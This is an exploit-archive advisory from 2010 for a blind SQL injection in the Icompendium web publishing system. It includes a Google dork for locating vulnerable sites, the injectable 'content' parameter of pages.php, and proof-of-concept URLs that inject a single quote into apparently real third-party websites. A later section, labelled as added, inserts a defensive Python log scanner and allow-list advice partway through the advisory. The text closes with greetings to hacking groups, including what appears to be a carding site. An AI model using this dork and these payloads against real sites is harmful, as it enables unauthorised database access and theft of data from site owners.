Icompendium Web Publishing System Blind SQL Injection Vulnerability

2010-08-01T00:00:00
ID 1337DAY-ID-13540
Type zdt
Reporter poni
Modified 2010-08-01T00:00:00

Description

Exploit for php platform in category web applications

# Date: 01/08/2010
# Software Link : http://www.icompendium.com
# Author: poni
# Site : http://forum.xcode.or.id
---------------------------------------------------------------------------------------------------------------------------------
Dork:
An icompendium Site inurl:/content=gallery.php
---------------------------------------------------------------------------------------------------------------------------------
[+] Vulnerable Path :
http://www.daehyuksim.com/pages.php?content=[BLIND SQL INJ]gallery.php&navGallID=XX
---------------------------------------------------------------------------------------------------------------------------------
[+] POC :
http://www.popboom.net/pages.php?content='gallery.php&navGallID=1
http://www.hjbott.com/pages.php?content='gallery.php&navGallID=5
---------------------------------------------------------------------------------------------------------------------------------
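Added example (not part of the original advisory): a log check that a site operator can run to spot tampering with the two pages.php parameters named above. The allow-list patterns for legitimate `content` and `navGallID` values and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate values are a plain .php file name and a numeric id.
SAFE_CONTENT_RE = re.compile(r"[A-Za-z0-9_-]+\.php")
SAFE_ID_RE = re.compile(r"\d+")

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2010:10:00:00 +0000] "GET /pages.php?content=gallery.php&navGallID=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2010:10:00:07 +0000] "GET /pages.php?content=%27gallery.php&navGallID=1 HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Aug/2010:10:00:09 +0000] "GET /pages.php?content=\'gallery.php&navGallID=5 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Aug/2010:10:01:00 +0000] "GET /index.php?content=%27x HTTP/1.1" 200 900',
]


def check_request(line):
    """Return the reasons a log line looks like parameter tampering on pages.php."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/pages.php"):
        return []
    # parse_qs percent-decodes values, so %27 and a literal quote compare alike.
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("content", []):
        if not SAFE_CONTENT_RE.fullmatch(value):
            reasons.append(f"content={value!r} is not a plain file name")
    for value in params.get("navGallID", []):
        if not SAFE_ID_RE.fullmatch(value):
            reasons.append(f"navGallID={value!r} is not numeric")
    return reasons


def scan(lines):
    """Return (line_index, reasons) for every flagged line."""
    return [(i, r) for i, line in enumerate(lines) if (r := check_request(line))]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG):
        print(index, reasons)
```

The same allow-list belongs in the application itself: reject any `content` value that is not a known page name before it reaches a query, and bind it as a parameter rather than concatenating it.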
Greetz :
[+] inj3ct0r.com
[+] ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath,
     fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666, Phychole,
     Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr, And You... the marvellous XCoders
     those change the Indonesian Underground scenes
# serverisdown.org, ssteam.ws, codenesia.com, hacker-newbie.org, YogyaCarderlink.web.id,
   devilzc0de.org, indonesianhacker.or.id
---------------------------------------------------End Of Paper---------------------------------------------------------------